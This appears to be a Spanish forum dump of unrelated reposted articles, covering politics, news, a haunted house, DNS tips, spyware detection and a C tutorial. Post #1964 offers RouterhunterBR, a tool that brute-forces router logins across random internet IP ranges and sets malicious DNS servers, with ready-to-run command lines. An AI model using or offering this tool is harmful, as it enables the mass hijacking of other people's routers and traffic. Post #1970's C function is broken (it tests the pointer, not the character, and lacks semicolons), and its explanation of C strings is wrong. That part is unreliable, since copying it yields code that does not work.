Los nuevos izquierdistas leen a Marx, pero son mucho más apasionados acerca de las últimas ideas progresistas. Se caracterizan por su interés hacia la democracia directa electrónica, la economía de red y el 'anticopyright'; la oposición a la globalización jerárquica en beneficio de las empresas transnacionales y el apoyo a la idea de una renta básica incondicional para todos como un medio para evitar desempleo y concentrarse en un trabajo creativo libre en una era de la robótica.

Asimismo, después de la crisis de 2008, comenzó a crecer rápidamente  el número de partidarios de un mayor control sobre los bancos y las corporaciones, la subida de impuestos a los ricos, y la lucha por preservar los logros sociales.

"Los izquierdistas apuestan por el desarrollo de las nuevas tecnologías", explica el escritor y activista ruso Alekséi Tsvetkov, poniendo como un ejemplo típico de las nuevas relaciones postcapitalistas, que no caben en el sistema capitalista, todo lo que está relacionado con el 'anticopyright'.

"Para nosotros es difícil imaginar cómo será el futuro postcapitalista, pero nos estamos acercando a él gracias al desarrollo de la tecnología, al crecimiento de la educación de las personas, a la aparición de nuevos grupos sociales. La ideología de la expansión del acceso público a las cosas es lo que une a todos los izquierdistas", explica el escritor.

En este sentido, prosigue, "los piratas informáticos también son izquierdistas, a un nuevo nivel tecnológico", ya que actúan de acuerdo con la lógica comunista: "Si tienes algo que compartir sin perderlo, tienes que compartirlo".

En opinión del escritor, "el derecho burgués, que defiende los derechos de autor, por ejemplo, en el caso de una película, parte del hecho de que se trata, en primer lugar, de una mercancía, y en el segundo, de una película para el público", mientras que los izquierdistas parten del hecho de que la película es una película, y verla como una mercancía distorsiona el significado de las cosas.

No obstante, Tsvetkov admite que en el sistema capitalista, la idea general de acceso libre a las cosas, a menudo conduce a un efecto contrario, y que no es lo mismo "un código abierto, que producen muchos y que utilizan todos, y la falta de recursos para hacer una nueva película si no pagan por ella".

"El libre acceso a la música, las películas, los artículos enriquece a las grandes corporaciones de Internet, mientras que los creativos y los equipos están en una crisis constante de recursos", lamenta el activista.

¿Estamos ante una nueva revolución?

En las ciencias sociales y la filosofía política, la mayoría de las nuevas ideas pertenecen a la izquierda, simplemente porque hablan de la transformación del mundo. Los conservadores buscan preservar las formas de vida y los valores existentes, el neoliberalismo cree en las leyes naturales del mercado y no en los proyectos sociales. "El progreso social necesita a los izquierdistas", destaca 'Russki Reporter'.

"Desde hace más de un siglo, la humanidad viene acercándose y parece ya estar cerca de un pico desconocido y sin precedentes de su evolución", comenta Georgi Derluguián, profesor de ciencias sociales y políticas en la Universidad de Nueva York en Abu Dhabi.

"A finales del siglo XX, el capitalismo se deshizo de los antiguos temores de la izquierda, obtuvo acceso a las gigantescas masas trabajadoras de China y el flujo de recursos de las exrepúblicas soviéticas. Pero, ¿significa esto que el capitalismo como sistema histórico es eterno?", se pregunta Derluguián. "Ningún sistema complejo es eterno. Se le acumulan costos y contradicciones", remata.

El capitalismo tiene cerca de cinco siglos. Hasta mediados del siglo XX los grupos capitalistas de Occidente dominaron el mundo de las colonias y el mundo agrario y campesino con altas tasas de natalidad y bajas expectativas de beneficios sociales. "Hoy en día está claro que todo esto ya no es así", concluye el analista.

"En realidad, aquí no se trata de simpatías personales, sino de lógica histórica", señala a su vez Alexéi Tsvetkov. "Para la derecha, la lógica del progreso simplemente no existe, existe solo la lógica de las normas tradicionales y las desviaciones de la misma. Para los liberales, la lógica del progreso existe hasta cierto punto, y luego la historia termina con el triunfo del libre mercado. Para los marxistas, la sociedad moderna no existe en la historia, sino en la prehistoria, hasta que se eliminen todas estas barreras", explica.

Tsvetkov está convencido de que la verdadera historia de la sociedad humana "empezará con la revolución comunista, porque finalmente todo volverá a la normalidad y el mundo al revés será reemplazado por uno adecuado".

"La mayoría de los izquierdistas, aunque no crean en la revolución comunista, mantienen este ideal en mente como un horizonte, como una forma de evaluar lo que está sucediendo", afirma.

Por otra parte, algunos expertos consideran que no ocurrirá un cambio radical sino que el capitalismo tendrá que realizar una serie de reformas para poder responder a los nuevos desafíos. "Se establecerá a nivel mundial un capitalismo reformado con mayor igualdad y derechos sociales para todos. No será el fin del capitalismo, sino la aparición de un capitalismo mejor", asegura el profesor de la Universidad de California, EE.UU., Michael Mann.

Si la historia de la relación entre el comunismo y el capitalismo ya por sí misma es tan complicada y ha dado lugar a tantos mitos e ideas falsas, el futuro de los dos sistemas es aún más incierto y difícil de predecir.

Volviendo al libro '¿Tiene futuro el capitalismo?, la conclusión conjunta de los expertos consiste en que la gran crisis de este sistema, "sea cual sea el escenario, no significa el fin del mundo", ya que "el fin del capitalismo inspira la esperanza" de su transformación en formas nuevas "más humanas" o su transición en el renovado socialismo democrático. Y usted, ¿qué opina al respecto?






En la elaboración de este artículo se han utilizado los archivos multimedia de RT, RIA Novosti, Reuters,  arbrenoir

Preparado por María Lekant, Iván Sérbinov

https://actualidad.rt.com/actualidad/180283-comunismo-capitalismo-mitos-diferencias-futuro

Pido disculpa si el articulo es muy largo pero no he podido evitar buscar información dado que se esta hablando mucho sobre el comunismo de Rusia pues en este articulo os va deja muchas cosas mas clara o eso espero.

Pequeñas normas prohibido comentar si antes a verse leído el articulo entero si queremos que el post dure algo.  :P


#1964
El RouterhunterBR Que es una herramienta de seguridad automatizada encuentra vulnerabilidades y realiza pruebas en los routers y dispositivos vulnerables en Internet. El RouterhunterBR fue diseñado para funcionar a través de Internet en busca de ips pistas o al azar definidos con el fin de explotar de forma automática el DNSChanger vulnerabilidad en routers domésticos.

El DNSChanger es un troyano capaz de dirigir peticiones de los usuarios a sitios ilegales. En la práctica, este malware tiene la capacidad de cambiar la configuración DNS de nuestra máquina de redirigir al usuario a sitios con fines maliciosos. Imagina, por ejemplo, que su sistema está infectado con este malware, lo que podría suceder es que el usuario tenga acceso a un sitio en particular (por ejemplo. Facebook.com) puede ser enviada a un sitio web no solicitados y potencialmente ilegal.



Requerimientos

Citarimport sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime

USO

Citar-range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP
 -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.
 -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
 -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
 -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1
 -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2
 --threads 10                                     Set threads numbers
 -rip, --randomip                                 Randomizing ips routers
 -lmtip 10, --limitip 10                          Define limite random ip

Comandos

Citarpython routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10                      
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10

Escáner de IP gama:

Citarpython routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10

IP range customized with wildcard / Ex: –startip 201.*.*.* – –endip 201.*.*.*

Citarpython routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10

La fuerza bruta con usuarios y contraseñas en los routers que requiere autenticación, obligando a la alteración del ADN – DSLink 260E.

Citarpython routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10

AUTOR: Jhonathan Davi A.K.A jh00nbr

GITHUB: https://github.com/jh00nbr/
#1965

Quería dejar este vídeo tutorial que he visto por Internet y que muchos usuarios se preguntan como pueden borrar los resultado personales del google pues esto ha sido lo que he encontrado a ver que tal lo veis y si os da resultado comentarlo.

Manual para una correcta utilización de esta herramienta:
https://support.google.com/webmasters...

Herramienta de Google (hay que estar registrados en Gmail):
https://accounts.google.com/ServiceLogin?service=sitemaps&passive=1209600&continue=https://www.google.com/webmasters/tools/removals&followup=https://www.google.com/webmasters/tools/removals#identifier

Autor: xarlydon

Si no esta en el sitio adecuado moverlo. Gracias. ;)
#1966
El joven granadino ha ingresado en prisión por una estafa de 80 euros con tarjeta de crédito, pero la Justicia considera que además mintió a las autoridades y huyó.

Alejandro Fernández junto a su abogado, Javier Gómez Rosales (EFE)


Seguro que ha escuchado el caso: Alejandro Fernández, un joven de Granada sin antecedentes penales previos, ingresó este martes en el centro penitenciario de Albolote por un delito de estafa con tarjeta de crédito falsa por una compra de 80 euros cometido hace seis años. Su familia ha creado una petición en la plataforma Change.org para solicitar el indulto y más de 300.000 ciudadanos apoyan la iniciativa, que por el momento ha sido denegada. La historia de Fernández ha recabado adhesiones en muchos medios de comunicación e incluso fue recibido el lunes por el alcalde de Granada.

"Alejandro tenía 18 años recién cumplidos y no sabía que la tarjeta que le habían dado era falsa. Compró en una tienda que vende batidos al por mayor por valor de 79,20 euros y por eso está en la cárcel", dice a este periódico Javier Gómez Rosales, encargado de su defensa. Sin embargo, la sentencia de la Audiencia Nacional (en PDF y anonimizada; Fernández es Isidro Daniel), ratificada íntegramente por el Supremo, narra una historia diferente. Fernández está sentenciado a cumplir una pena de cinco años en prisión por delito de falsificación de tarjetas de crédito y estafa; nada se menciona del episodio de los 80 euros.

Según la sentencia, que es firme, Fernández acudió el 15 de enero de 2010 al Carrefour Alameda de Málaga a bordo de un Golf rojo. En él viajaban tres personas más, amigos suyos, con antecedentes por hurto y lesiones. Efectuaron dos operaciones por importe de 299 y 257 euros con tarjetas falsas sin problema, pero regresaron para efectuar una última compra, una PlayStation y juegos por valor de 523 euros, y en ese momento fueron sorprendidos por las autoridades.

La Policía solo pudo detener a uno de los cuatro estafadores; los otros tres escaparon en el Golf al verlos. Fernández y otro compañero se entregaron días después en la comisaría de Málaga, si bien uno de ellos, Kamal, de nacionalidad nigeriana y considerado por Fernández como su "hermano mayor", todavía sigue en paradero desconocido. Precisamente la defensa de Fernández durante el juicio, como la de sus otros compañeros, se basó en acusar al africano de haberles engañado para obtener beneficios a través de las tarjetas falsas que él poseía, pero la jueza Ángela Murillo Bordallo no se creyó una sola palabra.


Una defensa que no se sostiene

La sentencia es muy crítica con la declaración de Fernández. "A preguntas de la propia defensa, el acusado matizó que Kamal en lugar de entregarle dinero efectivo [para las compras] le dio dos tarjetas con el nombre y apellidos del declarante, pero él 'nunca había visto una tarjeta'. No obstante, pensó que todo era legal". Continúa el texto: "Este desconocimiento inicial sobre el carácter falsario de las tarjetas no se sostiene en pie un solo instante. Si nunca había poseído ni visto una tarjeta de crédito, y de pronto se encuentra con que le entregan dos, a su nombre, con las que puede adquirir los efectos que le apetezcan... ¿cómo puede pensarse que todo esto era legal, que no era malo?".

La conclusión de la jueza no deja lugar a dudas: "Lo que realmente sucede es que este acusado, como los otros dos, en juicio pretendieron descargar parte de sus respectivas responsabilidades en el ausente Kamal, manteniendo los tres al unísono que este mandaba sobre ellos, ordenándoles realizar compras con tarjetas que resultaron ser inauténticas, donde figuraban sus respectivos nombres, y que aquel les entregaba. Esta versión la rechazamos por inverosímil y contraria a la lógica más elemental".
La teoría de que Fernández desconocía qué es una tarjeta de crédito, a pesar de que tenía dos a su nombre, una de Caja España y otra de Caja Rural, se resquebraja no solo por la declaración judicial, sino por la versión del ahora convicto, que sostiene que solo utilizó las tarjetas para comprar unos batidos, los de los 80 euros, antes del episodio del Carrefour, en el que ahora dice no haber estado. No obstante, ante la jueza admitió todas las acusaciones.


En la operación posterior, que terminó con ocho imputados, se encontraron pasaportes, tarjetas y carnés falsos, además de los útiles necesarios para la falsificación de documentos. Gómez Rosales indica que Fernández nada tiene que ver con esto y que solo fue engañado por su amigo Kamal, "que además era mucho mayor que él".

La sentencia de la Audiencia Nacional fue recurrida en casación ante el Tribunal Supremo, que ocho meses después la ratificó por completo. El juez Joaquín Giménez desestimó los recursos (en PDF y anonimizada; Donato es Fernández) aduciendo que Fernández fue "cooperador necesario al haber aportado a los autores materiales de la falsificación sus propios datos de identidad para hacerlos constar en las tarjetas", argumenta, "el recurrente, actuando de común acuerdo con los otros dos acusados y utilizando tarjetas espurias, realizó dos compras e intentó otra en Carrefour por un importe superior a 400 euros, lo que revela la existencia de un perjuicio para el titular de las tarjetas o para un tercero".

Rosales reconoce y acata esta sentencia, tan solo pide que se le explique documentalmente por qué le ha sido denegada la petición de indulto cumpliendo "todos lo requisitos para obtenerla". Si Fernández muestra buen comportamiento en prisión, podría obtener el tercer grado en 2019 y la condicional cuando haya cumplido tres cuartas partes de la pena.


Extracto de la sentencia de la Audiencia. Isidro Daniel es Fernández. (CENDOJ)

Extracto del recurso al Supremo. Donato es Fernández. (CENDOJ)

http://www.elconfidencial.com/espana/2016-06-08/alejandro-fernandez-tarjetas-falsas-estafa-sentencia_1213598/











#1967
Putin sitúa un submarino frente a las Islas británicas en vísperas del Inglaterra-Rusia

La prensa inglesa cataloga la acción como una provocación. El partido se disputa en Marsella el próximo sábado.


La Eurocopa no ha arrancado sobre el césped, pero sí fuera de los campos. En vísperas del partido que medirá en Marsella a Inglaterra con Rusia el próximo sábado (21:00, Telecinco), el presidente de Rusia, Vladimir Putin no ha encontrado mejor forma de calentar el partido que enviando el submarino Stary Oskol a las costas británicas. Los tabloides ingleses han puesto el grito en el cielo y The Sun advierte que "esta maniobra rusa es un acto de provocación con el partido de la Eurocopa 2016 de trasfondo".

El submarino fue interceptado en el Mar del Norte y fuertemente vigilado según navegaba la costa este del Reino Unido, en un movimiento defensivo que bien podría inspirar al equipo de Roy Hodgson"
The Sun dedica un artículo a la decisión de Putin en el que el tabloide alerta de la gravedad de la amenaza "ya que es la primera vez en la última década que se divisa un submarino en el Canal de La Mancha". Aunque luego recuerda  que "muchos otros navíos rusos han realizado la misma ruta sin ser detectados", apuntando que se sospecha que una flota de cinco sumergibles estuvo cerca de las costas británicas este invierno.

Después se toma a broma la maniobra y utiliza el submarino para hacer un simil futbolístico: "el submarino fue interceptado en el Mar del Norte y fuertemente vigilado según navegaba la costa este del Reino Unido, en un movimiento defensivo que bien podría inspirar al equipo de Roy Hodgson". Y termina apuntando que submarino es de la clase Kilo y posee capacidad para transportar 18 torpedos, misiles de crucero, minas y misíles tierra-aire. Comienza caliente la Eurocopa.


http://vozpopuli.com/deportes/83679-putin-manda-un-submarino-a-las-costas-inglesas-antes-del-inglaterra-rusia

Están nervioso los Rusos por que la UE va decidir renovar otros seis meses las sanciones económicas a Rusia.
#1968

La casa del 112 de Ocean Avenue , en la ciudad costera de Amityville, Long Island, al norte de Nueva York, es quizás la más casa embrujada más famosa del mundo, conocido por innumerables fans del horror como el escenario de innumerables películas y libros de terror. Pero Amityville es mucho más que eso, un conjunto de trágicos sucesos que ocurrieron entre 1974 y 1976. La historia comenzó en 1974, cuando seis miembros de una familia murieron en esa casa a manos del hijo menor, Ronald "Butch" DeFeo, Jr. La casa fue vendida al año siguiente a George y Kathy Lutz, quienes tenían tres hijos.

Poco después, los Lutz aseguraron que en la casa tuvieron que hacer frente a aterradoras fuerzas sobrenaturales. Entidades sobrenaturales arrancaron las puertas de las bisagras, rompieron armarios y provocaron peligrosas plagas de insectos. Después de todos estos terribles sucesos, los Lutz decidieron contar su historia a un escritor llamado Jay Anson, publicándola en su libro "La morada del miedo: Una historia verdadera", en 1977. Rápidamente se convirtió en un éxito en ventas, y representada en una película de terror de que dio lugar a diversas secuelas.  ¿Pero alguna vez has querido ser dueño de una verdadera casa embrujada? Una vez más, la morada del miedo ha sido puesta a la venta por su actual propietario, Caroline D'Antonio.


La renovada "morada del miedo"

Amityville, la propiedad de 1.500 metros cuadrados de estilo colonial construida en 1927, cuenta con cinco dormitorios y tres baños. Los elegantes detalles de la época incluyen puertas y armarios de roble, vidrios emplomados en estantes y armarios, una terraza interior climatizada y once ventanas de guillotina con vistas al mar. Además, la casa situada junto a un canal en el 112 de Ocean Avenue , viene con un cobertizo para pequeñas embarcaciones. Y todo esto por tan solo 850.000 dólares (unos 740.000 €).

D'Antonio y su marido compraron la casa en 2010 por 950.000 dólares (650.000€) después de que fuera valorada por 1.15 millones de dólares (1.02 millones de euros). Pero a parte de todos los detalles anteriormente comentados, también es una atracción turística popular. Y es en Halloween cuando la casa recibe más visitantes, invadiendo ambos lados de la casa y la parte trasera que da al canal.



Y como hemos comentado anteriormente, la casa se hizo mundialmente famosa en 1974 después de que Ronald DeFeo, de 23 años, matara a sus padres y cuatro hermanos mientras dormían. En la actualidad, Ronald está cumpliendo cadena perpetua en el centro penitenciario Green Haven Correctional Facility, Beekma, Nueva York, y la casa de su difunta familia fue vendida a la familia Lutz en 1976.

Pero los extraños sucesos comenzaron casi inmediatamente después de que la familia Lutz se trasladara a la nueva propiedad, obligándolos a marcharse un año después. La familia Lutz facilitó grabaciones de audio al escritor Jay Anson, quien fue el encargado de describir las experiencias paranormales en la casa, incluyendo sombra oscuras, extrañas sustancia procedente de los baños y actividad inexplicable en el sótano. Según los expertos, la casa podría estar construida sobre un cementerio indio.

En 1977, Anson publicó el libro "La morada del miedo: Una historia verdadera", y dos años después los actores James Brolin y Margot Kidder interpretaron a George y Kathy Lutz en la película de terror original, basada en el libro. Y esto solo fue el principio de una gran numero de secuelas y remakes. Pero la polémica surgió con la imagen de lo que parece un niño, que bien podría ser uno de los hijos fallecidos de la familia DeFeo. La fotografía apareció por primera vez en la colección de George Lutz, en una investigación dirigida por los famosos parapsicólogos Ed y Lorraine Warren en 1976.



Si bien la historia de la casa podría aterrorizar a algunos de los futuros compradores, la inmobiliaria dice que los D'Antonio disfrutaron plenamente de la propiedad, incluyendo el desfile diario de turistas. Al parecer, Caroline D'Antonio ha decidido poner la casa en venta porque su marido falleció el año pasado y asegura que ya no necesita un espacio tan grande para vivir.

"Algunos vecinos no se refieren a la historia como el horror de Amityville, sino como el fraude de Amityville", explicó Caroline. "La única historia de terror es que una familia fue asesinada en esta casa."

Sin embargo, son muchos los que creen que Caroline D'Antonio intenta restar importancia a la venta de la casa para no perder futuros compradores, ya que esta sería la explicación del por qué quiere vender la casa a un precio más bajo que cuando la compró en 2010. Por desgracia, ni los turistas ni los creyentes en lo paranormal podrán visitar la casa. Sólo se permitirá recorrer la morada del miedo a compradores serios, después de rellenar una solicitud y proporcionar un aval bancario varios días antes de la visita programada. Puedes encontrar más in formación sobre el horror de Amityville descrito por un de los miembros de la familia Lutz en el siguiente enlace: "Daniel Lutz cuenta por primera vez la historia real de Amityville".


¿Te atreverías a comprar una casa así?

http://www.mundoesotericoparanormal.com/ponen-venta-amityville-morada-miedo/
#1969
En este tutorial te mostramos cómo cambiar las DNS para aumentar la velocidad de Internet con DNS Jumper 2.0, un sencillo programa gratuito para Microsoft Windows.

1: Cómo cambiar las DNS en Windows en vídeo

En ocasiones a pesar de tener contratada una línea de alta velocidad con muchos megas no se logra la sensación de navegación fluida y mejora de la velocidad de Internet deseable.

Son muchos los elementos que pueden influir en la velocidad de una conexión a Internet, desde elementos externos como el tipo de tecnología utilizada (fibra, ADSL, Satélite etc.) o la distancia al punto de terminación de la red (PTR), a factores internos dentro de casa, como el router utilizado, el cableado o el uso de conexiones inalámbricas WiFi -de estas últimas ya te hemos hablado y enseñado en otras ocasiones cómo aumentar la señal WiFi para mejorar tu conexión inalámbrica-.


Aunque para lograr aumentar la velocidad de Internet en casa y tener una buena experiencia de navegación por la Red también es fundamentar tener en consideración otros factores menos conocidos, pero igual de influyentes, como las direcciones DNS.


2: ¿Qué son las direcciones DNS?
[/i]


Las siglas DNS responden a la abreviatura Domain Name System (Sistema de Nombres de Dominios) y son las encargadas de traducir los nombres de dominio -fáciles de recordar- de una página web como Computerhoy.com, en la dirección IP del servidor donde se encuentra alojada la página web que estás buscando, en nuestro caso 93.189.32.186, por ejemplo.

En tiempo que tarde el servidor DNS en realizar esta conversión resulta crítico a la hora navegar por la red, e incluso puede ser el causante de que algunas direcciones no sean accesibles, por lo que cambiar las DNS y seleccionar aquellas más adecuadas para tu tipo de conexión, proveedor y ubicación geográfica, puede ayudarte a mejorar y aumentar la velocidad de Internet.

En otras ocasiones ya te hemos mostrado cómo configura las direcciones DNS y optimiza tu red y velocidad, accediendo la configuración del router, aunque si no quieres complicarte la vida la mejor opción es DNS Jumper 2.0, un sencillo software gratuito para Windows con la que podrás cambiar las DNS de tu equipo y comprobar al instante si has conseguido mejorar la velocidad de tu conexión a Internet.



3: Cambiar las DNS con DNS Jumper 2.0

Una vez descargado, no es necesaria su instalación, ejecuta el programa para acceder a la ventana principal y selecciona el adaptador -Ethernet o WiFi- con el que te conectas a Internet.


En el siguiente paso ya podrías seleccionar nuevas direcciones DNS de entre la larga lista disponible en la sección "Elegir un servidor DNS" para, una vez seleccionada, presionar "Aplicar DNS" para guardar los cambios.


4: Seleccionar las mejores DNS para tu conexión

Aunque lo ideal antes de elegir unas direcciones DNS disponibles es comprobar su eficiencia con respecto a tu conexión, para ello presiona sobre "DNS más rápido".


En la nueva ventana pulsa sobre "Iniciar Test" para realizar una sencilla prueba con todas las DNS disponibles. Una vez finalizado obtendrás un el listado ordenador según su velocidad, para de esta forma puedas cambiar las DNS por aquellas que mejor se adapten a tu conexión y te permitan aumentar la velocidad de Internet.


Podrás elegir las DNS de un proveedor, o mezclar las mejores opciones de dos proveedores distintos, aunque te recomendamos que después de realizar el cambio, compruebes si todo funciona de forma óptima y si las direcciones DNS seleccionadas, además de mejorar tu velocidad de Internet, te permite acceder a todos los sitios web que utilizas de forma frecuente. En caso, contrario, prueba con las siguientes DNS que mejor rendimiento te ofrezcan. Más sencillo, imposible.


Autor de este articulo: Iván Muñoz
#1970

Los binarios y decimales son dos formas diferentes de representar números enteros. En el lenguaje C de programación, los binarios se almacenan generalmente en cadenas de carácteres o algún otro tipo de arreglo. Las cadenas de carácteres en C se denominan punteros porque apuntan al orden inferior de un bit de una cadena binaria, la cual termina con el carácter especial C "\0" seguido del bit superior. Para convertir esta cadena binaria en un valor equivalente integrado necesitas de un programa para escribir repetidamente o como recurso.

Instrucciones

1-Desarrolla un algoritmo para convertir antes de empezar a escribir un código. Necesitas dos variables: un acumulador para seguir los resultados y la variable "energía" para dar cuenta del aumento de poder de 2 que describe las diferentes posiciones del bit de un número binario. Por ejemplo, el entero 13 se almacena como binario 1101. Este número es (1 X 2^3) + (1 X 2^2) + (0 X 2^1) +(1 X 2^0) o 8 + 4 + 0 + 1 = 13. Porque la forma en los dígitos binarios se almacenan en C, se debe empezar en el orden inferior del bit y multiplicar cada bit para incrementar los valores de la variable de energía y agregarlos al acumulador.

2-Descubre la función en el pseudocódigo, examínalo con unos ejemplos, ajústalo si es necesario y escribe el código C directamente del pseudocódigo. Nombre de la función: entero2binario. Entrada: un puntero a un tipo de carácter. Salida de un entero. Empieza la función definiendo dos variables de enteros: acc, un acumulador y pow, un estante 1. Continúa haciendo 3 afirmaciones en el bucle hasta que el puntero apunte al carácter "\0", entonces regresa el valor de acc como el valor de la función. Los tres bucles son: si el puntero apunta a "1", agrega el valor del estante al acumulador, dobla el valor del estante e incrementa el puntero para que apunte al siguiente bit.

3-Convierte el pseudocódigo al código C: int binary2integer(char * p){ int acc,pow; acc = 0; pow = 1; while (p != '\0'){ if (p == '1') acc +=pow; pow *= 2; p++} return acc}. Este código debe examinarse con varios ejemplos. Asegúrate de revisar los valores límites como 0 y 1, así como también varios valores como 11111, 00000, 10101 y 01010.


Bueno lo posteo aquí por si algún usuario nuevo esta aprendiendo y le interesa este tutorial que he visto en esta pagina os dejo link.

http://www.ehowenespanol.com/convertir-binarios-entero-del-lenguaje-programacion-como_239443/

Saludos.
#1971
El software de seguimiento está diseñado para ejecutarse en el equipo sin ser detectado, pero algunos programas no están tan bien escondidos como otros. Con el uso de diferentes recursos puedes revisar tu computadora para examinar cualquier actividad sospechosa y obtener alguna pista sobre si tus actividades en tu equipo están siendo monitorizadas o no.

Algunos programas de rastreo pueden poner en peligro tu propia seguridad personal. Los Keyloggers por ejemplo, hacen un seguimiento de las pulsaciones del teclado y transmiten esa información a un tercero. Esto puede ser un problema serio si utilizas tu computadora para conectarte a sitios personales, tales como tu cuenta bancaria en línea. Por lo tanto, si sospechas que tienes instalado software de seguimiento en tu equipo es una buena idea hacer una investigación para confirmarlo.


Instrucciones

1-Revisa tus programas instalados. Haz clic en "Inicio" y luego en "Panel de control". Selecciona "Programas y características". Deja que la lista se rellene por completo y luego muévete a través de cualquier software desconocido. Busca este software en un motor de búsqueda para confirmar si es o no un programa de rastreo.

2-Revisa tus procesos. Pulsa las teclas "Ctrl", "Shift" y "Esc" al mismo tiempo para abrir el Administrador de tareas. Haz clic en la pestaña "Procesos".

3-Ordénalos por "Nombre de usuario". Si hay algunos nombres que no sean "Servicios de red", "Servicios locales", "Sistema" o tu nombre de inicio de sesión, es posible que alguien esté siguiendo tu equipo de forma remota. Busca el nombre del proceso (localizado bajo la categoría "Nombre de imagen") en un motor de búsqueda para confirmarlo.

4-Comprueba tu firewall. Vuelve al Panel de control y haz doble clic en "Firewall de Windows". Haz clic en "Permitir un programa a través del Firewall de Windows". Haz clic en "Continuar" si aparece el Control de cuentas de usuario.

5-Haz clic en la pestaña "Excepciones" y desplázate por la lista de programas. Si encuentras algún software sospechoso o desconocido, comprueba el nombre en un buscador y quita la marca de verificación que está adyacente. Haz clic en "Aceptar".

6-Descarga, instala y ejecuta un software anti-malware, como "AdAware" o "Spybot". Ejecuta la utilidad de actualización del software para instalar las definiciones del malware más reciente (software malicioso).

7-Utiliza la función de exploración del software para que busque en tu sistema. Sigue las instrucciones del programa en pantalla para deshacerte de cualquier software malicioso que encuentre.


Escrito por Ruri Ranbe
#1972
Las advertencias turcas de que las relaciones bilaterales se verán afectadas no han frenado el voto.


Con solamente un voto en contra y una abstención, el pleno del Bundestag alemán ha votado la moción de reconocimiento del «genocidio» armenio de Turquía presentada conjuntamente por los grupos parlamentarios cristianodemócrata (CDU), socialdemócrata (SPD) y de Los Verdes. Pocas horas antes de la sesión parlamentaria, el primer ministro turco Binali Yildirim, declaraba que «Turquía espera que Alemania no se convierta en un medio para un asunto irracional de ese tipo» y expresó veladas amenazas al acuerdo entre Turquía y la UE para la recepción de refugiados si se producía finalmente el voto. «A veces los países que consideramos nuestros amigos aparecen con estas ideas raras cuando tienen problemas en la política doméstica. Y está (la moción de hoy) es una de ellas», señaló Yildirim ante un comité de líderes del gobernante e islamista partido AKP. Pero lo cierto es que a medida que aumentaba el tono amenazante desde Estambul, mayor consenso se levantaba en torno a la votación.

«Nuestra experiencia nos demuestra que la revisión del pasado, también del pasado de otros países, no solamente no afecta de forma negativa a nuestras relaciones, sino que nos ayuda a comprendernos mejor», declaraba el presidente del Bundestag, Norbert Lammert, en su discurso de apertura de la sesión. «El actual gobierno de Turquía no es responsable de lo que sucedió hace cien años, pero sí lo es de lo que se piense en el futuro de aquellos hechos», advirtió a la administración Erdogan, despertando un aplauso unánime de la cámara al añadir que las amenazas contra la libertad de expresión de esta cámara parlamentaria son «absolutamente inaceptables».

«Sin que sirva de precedentes, vamos a emitir el mismo voto que el resto de Sus Señorías», ironizaba el líder de Die Linke (La Izquierda), Gregor Gysi, tradicional voto en discordia con el resto del parlamento, celebrando que «por fin hayan vencido sus partidos esa extraña enfermedad que les permite estar de acuerdo con nosotros». En su discurso, Gysi evitó incluso criticar la ausencia «por motivos de agenda» de los dos líderes de la gran coalición de gobierno, la canciller Angela Merkel y el vicecanciller socialdemócrata Sigmar Gabriel.

El presidente turco, Recep Tayyip Erdogan, había advertido hace solo unos días que esta moción podría afectar las relaciones entre Alemania y Turquía debido a que el texto menciona un «exterminio planificado» y lo destaca como ejemplo de los genocidios y limpiezas étnicas cometidos a lo largo del siglo XX. El entonces Imperio alemán fue durante la Primera Guerra Mundial el principal aliado militar del Imperio Otomano, cuyo sucesor legal es la actual República de Turquía, pero mientras Alemania desea calificar legalmente los hechos en esos términos, Turquía sigue negando el genocidio.


http://www.abc.es/internacional/abci-bundestag-aleman-condena-genocidio-armenio-turquia-201606021306_noticia.html

Alemania condena el genocidio armenio de Turquía ? Siendo el primer país que mas judío mató en el Holocausto por parte del régimen nazi y sus colaboradores nada mas y nada menos que seis millones de judíos.
#1973

Menos de un año después de su precipitado cierre por la llegada a España de beIN Sports reaparece en las ondas, casi por sorpresa, el canal Gol en la TDT que completa la nueva oferta de canales tras la última ronda de licencias aprobadas por el Consejos de Ministros que dio luz verde en otoño a canales como Real Madrid TV, ATresSeries o Be MAD.

En ComputerHoy te explicamos cómo sintonizar el canal Gol en la TDT, que por el momento emitirá en abierto gratis para todos. Evidentemente será un canal dedicado al deporte y especialmente al fútbol, por lo que habrá que ver qué tipo de contenidos ofrece tanto durante la Eurocopa 2016 que retransmitirá en abierto Mediaset como durante la próxima temporada de Liga, cuando desde Mediapro esperan que el nuevo Gol TV se encuentre ya a pleno rendimiento.

El nuevo canal Gol TV ha iniciado sus emisiones abierto con la retransmisión del campeonato del mundo sub-18 de baloncesto 3x3 que se celebra en la capital de Kazajistán, Astaná, del 1 al 5 de junio. Durante las próximas semanas se podrán seguir otras competiciones como los torneos del World Padel Tour, el campeonato DTM, varios torneos de fútbol playa o el campeonato de europa de voley playa.

Mediapro rescata de esta manera un canal que se evaporó tras llegar a un acuerdo con Al Jazeera para explotar comercialmente en España la marca beIN Sports, que opera con fuerza en otros países, especialmente Estados Unidos y Francia. La filial española consiguió hacerse con los derechos de pago en exclusiva para retransmitir la última edición de la Champions League.

¿Cómo sintonizar Gol en la TDT?

Cada televisor es diferente, incluso aunque comparemos dos modelos del mismo fabricante, pero a la hora de la verdad las instrucciones para sintonizar Gol TV en la TDT gratis son bastante sencillas.

El primer paso consiste en entrar al menú de configuración de la TV, que normalmente cuenta con su propia tecla en el mando a distancia, y localizar una casilla de "búsqueda automática de canales", "sintonización automática" o algo similar.

